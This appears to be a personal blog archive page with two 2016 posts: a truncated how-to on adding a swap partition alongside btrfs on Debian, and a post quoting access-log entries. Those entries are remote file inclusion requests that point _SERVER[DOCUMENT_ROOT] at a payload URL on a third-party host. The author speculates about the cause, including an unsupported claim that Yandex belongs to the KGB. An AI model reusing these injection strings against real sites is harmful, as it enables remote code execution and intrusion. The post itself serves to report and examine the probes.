14th April 2016
Recently I had a need to add a swap file to my Debian installation.
However, I am now using btrfs, and – as with any other COW filesystem – it is not possible to simply create a swap file and use it.
There are workarounds (creating a file with a COW attribute removed, and then loop-mounting it), but I just did not like them.
So I have decided to add a swap partition.
It worked amazingly (and very easily), there was even no need to reboot – at all.
I still did restart, just to make sure the system is bootable – and all was perfectly fine.
My initial setup is very simple: a single /dev/sda1 partition on the /dev/sda disk, fully used by btrfs.
Different important paths/mountpoints are btrfs subvolumes, using flat hierarchy.
For this example, let us assume that /dev/sda (and /dev/sda1) is 25GB large, and that I want to add a 2GB swap /dev/sda2 after /dev/sda1.
Brief explanation before we start:
- shrink btrfs filesystem by more than 2GB;
- shrink btrfs partition by 2GB;
- create new 2GB partition for the swap;
- resize btrfs filesystem to full size of its new-size partition;
- initialize swap and turn it on.
Here are the very easy steps! Just make sure you do not make mistakes anywhere
Read the rest of this entry »
Posted in *nix, how-to | No Comments »
11th April 2016
Here is a recent entry from my web-server’s access log:
bogdan.org.ua:80 188.8.131.52 – - [09/Apr/2016:15:53:22 +0300] “GET /categories/programming?_SERVER[DOCUMENT_ROOT]=http://www.daedongfur.co.kr/shop/log/.logs/id1.txt HTTP/1.1″ 200 13158 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”
Client’s IP 184.108.40.206 does belong to Yandex network range.
- Had Yandex started looking for vulnerabilities in the web-sites it scans?
- Does it only look for vulnerabilities in the .UA web-sites/domains?
- Does Yandex really use a Korean web-site to host malicious code?
In fact, there are more entries like that one, also from one of Yandex IPs:
bogdan.org.ua:80 220.127.116.11 – - [04/Apr/2016:00:14:22 +0300] “GET /categories/programming/page/5?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12607 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”
bogdan.org.ua:80 18.104.22.168 – - [04/Apr/2016:00:19:31 +0300] “GET /categories/programming/page/4?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12174 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”
I can see 3 explanations, and all of them are bad for Yandex:
- Yandex now belongs to KGB, and it does scan [.UA] web-sites for vulnerabilities;
- some/many of Yandex crawler servers are compromised, and are used by malicious 3rd parties;
- there was a public malicious link somewhere (???) to my blog, and Yandex blindly followed it.
Posted in Misc, Web | No Comments »